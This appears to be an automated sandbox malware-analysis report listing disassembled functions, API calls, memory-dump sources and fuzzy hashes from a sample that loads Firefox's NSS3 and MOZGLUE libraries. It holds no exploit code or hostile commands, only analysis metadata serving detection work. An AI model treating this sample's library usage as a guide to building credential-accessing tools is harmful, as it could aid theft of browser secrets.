free.MOZGLUE(00000000), ref: 6BCCCC47

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: 1dd05fef361b146eced85f9dc158802774d63aeabf47389c5f60cbc17ffa4e79
Instruction ID: 3a08020ca440137a93f88d57831f8384f40092b1d0f8558cb6e14d36ad021dd9
Opcode Fuzzy Hash: 1dd05fef361b146eced85f9dc158802774d63aeabf47389c5f60cbc17ffa4e79
Instruction Fuzzy Hash: E4F022716002016BE6106BB99C46A5B769CEF06AA9F080038E989C7242FB29D610C3F7

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCC9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6BC41AB6,00000000,?,?,6BC407B9,?), ref: 6BCCC9C6
free.MOZGLUE(?,?,6BC407B9,?), ref: 6BCCC9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6BCCC9E5
free.MOZGLUE(?), ref: 6BCCC9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6BCCC9F8
free.MOZGLUE(?), ref: 6BCCC9FF
free.MOZGLUE(00000000), ref: 6BCCCA0B

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 6796ceeb8d4f30dda58728119adc914e3bed10279711e34b586431ad85ef8e2a
Instruction ID: 6edc54ad6d6e3366176b65af3e3c27d68965ae15b6edd8eb8be33ef82cb0b5ca
Opcode Fuzzy Hash: 6796ceeb8d4f30dda58728119adc914e3bed10279711e34b586431ad85ef8e2a
Instruction Fuzzy Hash: 1D014FB2500605ABEB10DFB4CC48857B7FCFE492617080529E906C7600E735F559DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC0A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1929b624c761c93edd67b88cb3877ff83a201943cabf9f864e3bba0965e5c70
Instruction ID: 4e45af893edeca8df543a1b8bffbe094245184b24aacb53d9682a96747cf3d2d
Opcode Fuzzy Hash: a1929b624c761c93edd67b88cb3877ff83a201943cabf9f864e3bba0965e5c70
Instruction Fuzzy Hash: 37912170E251684BCB25CF1888913DA77B5AFCA714F0540D5E5A99B201FE3B8F85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC48AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6BC36F38), ref: 6BC48B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6BC48B58
NSS_OptionGet.NSS3(00000009,?), ref: 6BC48B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6BC36F38), ref: 6BC48BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6BC48C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6BC48C1A

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID:
API String ID: 927613807-0
Opcode ID: d3fc9ff626842cb86b8860a8993f353078d963df24dc3130bb7a7b299c772c75
Instruction ID: f3b370e19c84121dabb197764472297c40cdb7bb8f784a2659308b09f3c22ab4
Opcode Fuzzy Hash: d3fc9ff626842cb86b8860a8993f353078d963df24dc3130bb7a7b299c772c75
Instruction Fuzzy Hash: 13411671A121098BEF00EAA5DC92BAF77E5EB41344F808420CD89DB1C4F36C9B4687D2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD6B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BBD6BA9

Part of subcall function 6BBD9520: PK11_IsLoggedIn.NSS3(00000000,?,6BC0379E,?,00000001,?), ref: 6BBD9542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BBD6BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BBD6BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6BBD6B97

Part of subcall function 6BBF1870: TlsGetValue.KERNEL32 ref: 6BBF18A6
Part of subcall function 6BBF1870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6BBD6C34,?,?,00000001,00000000,00000007,?), ref: 6BBF18B6
Part of subcall function 6BBF1870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BBD6C34,?,?), ref: 6BBF18E1
Part of subcall function 6BBF1870: PR_SetError.NSS3(00000000,00000000), ref: 6BBF18F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6BBD6C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BBD6C61

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: 50f1b6d98c508b52a7638c058bf2de4f94769b56da2aabf67c8435402825d789
Instruction ID: 66b44344a0450c6f0cddf3dbcc04ada7ea3bd90a24df2d88f8f8bbfbadd81542
Opcode Fuzzy Hash: 50f1b6d98c508b52a7638c058bf2de4f94769b56da2aabf67c8435402825d789
Instruction Fuzzy Hash: 2F3104B1A003419BE7088F64DC82F6A7768EB59754F040169FE096B382E77DD95186E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB9A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6BC79270), ref: 6BB9A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6BC79270), ref: 6BB9A9DE

Part of subcall function 6BB9AB40: __aulldiv.LIBCMT ref: 6BB9AB66

Part of subcall function 6BC7CA40: LeaveCriticalSection.KERNEL32(?), ref: 6BC7CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6BB9AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6BB9AA39
EnterCriticalSection.KERNEL32(?), ref: 6BB9AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BB9AAEB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: 3f3fc329445304bce0f8e4a748676c970ed652cdabe92f27a075d797a41d33c1
Instruction ID: 1734e0563e5f0eefa463f65a3987d67e902899c927bcdd348bdb5125455bc988
Opcode Fuzzy Hash: 3f3fc329445304bce0f8e4a748676c970ed652cdabe92f27a075d797a41d33c1
Instruction Fuzzy Hash: 05416D709047418FD714AF28D584796FBE1FB46324F24867DE85D8B241DB79D981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB1BF0 Relevance: 9.1, APIs: 6, Instructions: 94threadmemoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBB1C0C

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PORT_NewArena_Util.NSS3(00000800), ref: 6BBB1C20
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6BBB1C37
PR_GetCurrentThread.NSS3 ref: 6BBB1C76
PR_GetCurrentThread.NSS3 ref: 6BBB1CB1
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BBB1CDE

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Arena_CurrentThread$Alloc_ArenaErrorFreeValue
String ID:
API String ID: 2304596573-0
Opcode ID: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
Instruction ID: f2bb99967e537efe7e72b0ffa8ac50ed5b1b5e0535e493454487d3addf77d1aa
Opcode Fuzzy Hash: 9d5640a65a64047ac5af3fb7567be9bca082c7a784147850f5c80293ece743cb
Instruction Fuzzy Hash: BD2136B2D20264ABEB208FB5DD41F7B3B68EF04344F080164FD089A212FB79D660C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC8A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6BCC8A8F

Part of subcall function 6BBA0F00: PR_GetPageSize.NSS3(6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F1B
Part of subcall function 6BBA0F00: PR_NewLogModule.NSS3(clock,6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F25

htons.WSOCK32(?), ref: 6BCC8ACB
PR_GetCurrentThread.NSS3(?), ref: 6BCC8AE2
htons.WSOCK32(?), ref: 6BCC8B1E
htonl.WSOCK32(7F000001,?), ref: 6BCC8B3B

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: 9821b85277f7894a4f1559dd7b517870ad40b930536c398da04b2aef5a9d3212
Instruction ID: 5d075fa2df7f8478bfc53cb913148c7b5f3e18b8b146ec668ffad49f51076caf
Opcode Fuzzy Hash: 9821b85277f7894a4f1559dd7b517870ad40b930536c398da04b2aef5a9d3212
Instruction Fuzzy Hash: 5E21AD70D3474199C3208F758942937B3B5AFA6304B12DA1EE8D997511F738A6C0C352

Uniqueness

Uniqueness Score: -1.00%

Function 6BC10AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10AAE
PL_HashTableDestroy.NSS3(?,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10ACA
PL_HashTableDestroy.NSS3(?,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10B24
free.MOZGLUE(?,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10B3C
memset.VCRUNTIME140(6BD124E4,00000000,000005B0,?,?,6BBC7F62,00000000,00000000,?,?,?,6BBC80DD), ref: 6BC10BC2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: 3ec5e7a75e6595445b6752b6f1ea7ad56cf9446bc84cef3603b943f89dd5fb75
Instruction ID: b063018729d5369785e5a1ab879e318834a47de7b20be50310470f48b96faf0f
Opcode Fuzzy Hash: 3ec5e7a75e6595445b6752b6f1ea7ad56cf9446bc84cef3603b943f89dd5fb75
Instruction Fuzzy Hash: 3E21FBB0A552069EFF10CF299807B02BBA8E72735CF808025E409EA641F73AD265CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6BC08A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6BBB61C4,?,6BBB5F9C,00000000), ref: 6BC08A81
TlsGetValue.KERNEL32(?,?,?,6BBB5F9C,00000000), ref: 6BC08A9E
EnterCriticalSection.KERNEL32(?,?,?,?,6BBB5F9C,00000000), ref: 6BC08AB7
PR_Unlock.NSS3(?,?,?,?,?,6BBB5F9C,00000000), ref: 6BC08AD2
PR_NotifyCondVar.NSS3(?,?,?,?,?,6BBB5F9C,00000000), ref: 6BC08B05
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6BBB5F9C,00000000), ref: 6BC08B18

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CondNotifyValue$CriticalEnterSectionUnlock
String ID:
API String ID: 1007705821-0
Opcode ID: 140d24271e6d0a72a26765b867053fcbf4992d04785dd4ed0f9931f5834aa839
Instruction ID: 02a6c657c10853fc52b74cba341e9e0234e61bfe548e692ea053de692fbf4cda
Opcode Fuzzy Hash: 140d24271e6d0a72a26765b867053fcbf4992d04785dd4ed0f9931f5834aa839
Instruction Fuzzy Hash: 42217FB0914704CFEB10AF79C445A29B7F4FF15744F058A69D8958B640FF3AE684CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC89E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6BBC88AE,-00000008), ref: 6BBC8A04
EnterCriticalSection.KERNEL32(?), ref: 6BBC8A15
memset.VCRUNTIME140(6BBC88AE,00000000,00000132), ref: 6BBC8A27
PR_Unlock.NSS3(?), ref: 6BBC8A35
memset.VCRUNTIME140(6BBC88AE,00000000,00000132,00000000,-00000008,00000000,?,?,6BBC88AE,-00000008), ref: 6BBC8A45
free.MOZGLUE(6BBC88A6,?,6BBC88AE,-00000008), ref: 6BBC8A4E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 58fb2318e53f5cb4cf8a7ee6d5e5bdbaf4bcec91b3a9c0dff698ad738820c69f
Instruction ID: 08dde86947cd4027701022319a7be71dab2641a9f0cedf0c4576434a105249a6
Opcode Fuzzy Hash: 58fb2318e53f5cb4cf8a7ee6d5e5bdbaf4bcec91b3a9c0dff698ad738820c69f
Instruction Fuzzy Hash: DA11E2B6D00201AFEB00DF78DC86A6BBB78FF05714F040665F9189A201E735EA91C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC8A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6BBC8FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6BBD0710), ref: 6BBC8FF1
Part of subcall function 6BBC8FE0: calloc.MOZGLUE(00000001,00000000,?,?,6BBD0710), ref: 6BBC904D
Part of subcall function 6BBC8FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6BBD0710), ref: 6BBC9066
Part of subcall function 6BBC8FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6BBD0710), ref: 6BBC9078

TlsGetValue.KERNEL32 ref: 6BBC8AC1
EnterCriticalSection.KERNEL32 ref: 6BBC8AD6
PL_FinishArenaPool.NSS3 ref: 6BBC8AE5
PR_Unlock.NSS3 ref: 6BBC8AF7
DeleteCriticalSection.KERNEL32 ref: 6BBC8B02
free.MOZGLUE ref: 6BBC8B0E

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: ccf0bab44f191dbb62b2dfe3fb0abcf7b3dcc06f1861ec1d0f48a4e0ebda68ab
Instruction ID: 86fa7a402e85085bed80fbb8d41978325cf18cc17af92057d3d8173b6f1ee630
Opcode Fuzzy Hash: ccf0bab44f191dbb62b2dfe3fb0abcf7b3dcc06f1861ec1d0f48a4e0ebda68ab
Instruction Fuzzy Hash: 3B1107B14046458FEB00AF78C88A66EBBF4FF01344F05496DD8858B201EB39E599CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC43BD0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6BC45B40: PR_GetIdentitiesLayer.NSS3 ref: 6BC45B56

PR_EnterMonitor.NSS3(?), ref: 6BC43BF9

Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC790AB
Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC790C9
Part of subcall function 6BC79090: EnterCriticalSection.KERNEL32 ref: 6BC790E5
Part of subcall function 6BC79090: TlsGetValue.KERNEL32 ref: 6BC79116
Part of subcall function 6BC79090: LeaveCriticalSection.KERNEL32 ref: 6BC7913F

PR_EnterMonitor.NSS3(?), ref: 6BC43C10
free.MOZGLUE(?), ref: 6BC43C26
PORT_Strdup_Util.NSS3(?), ref: 6BC43C30
PR_ExitMonitor.NSS3(?), ref: 6BC43C52
PR_ExitMonitor.NSS3(?), ref: 6BC43C69

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$EnterValue$CriticalExitSection$IdentitiesLayerLeaveStrdup_Utilfree
String ID:
API String ID: 980993467-0
Opcode ID: 1d73b99a95bd86fd283a04ac8783603168ce42b167936e8629fb5352c10acf8b
Instruction ID: d5907705b9cff180dc2e61434f08253b2d589d6fd14ffc36d9ab9ab78a17fb3a
Opcode Fuzzy Hash: 1d73b99a95bd86fd283a04ac8783603168ce42b167936e8629fb5352c10acf8b
Instruction Fuzzy Hash: 9A01CCB1A305006BE7305B39EC06A87B7B5EBC1214F044534E45EC6121F739F719C692

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC8910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6BCC892E

Part of subcall function 6BBA0F00: PR_GetPageSize.NSS3(6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F1B
Part of subcall function 6BBA0F00: PR_NewLogModule.NSS3(clock,6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F25

PR_Lock.NSS3 ref: 6BCC8950

Part of subcall function 6BC79BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6BBA1A48), ref: 6BC79BB3
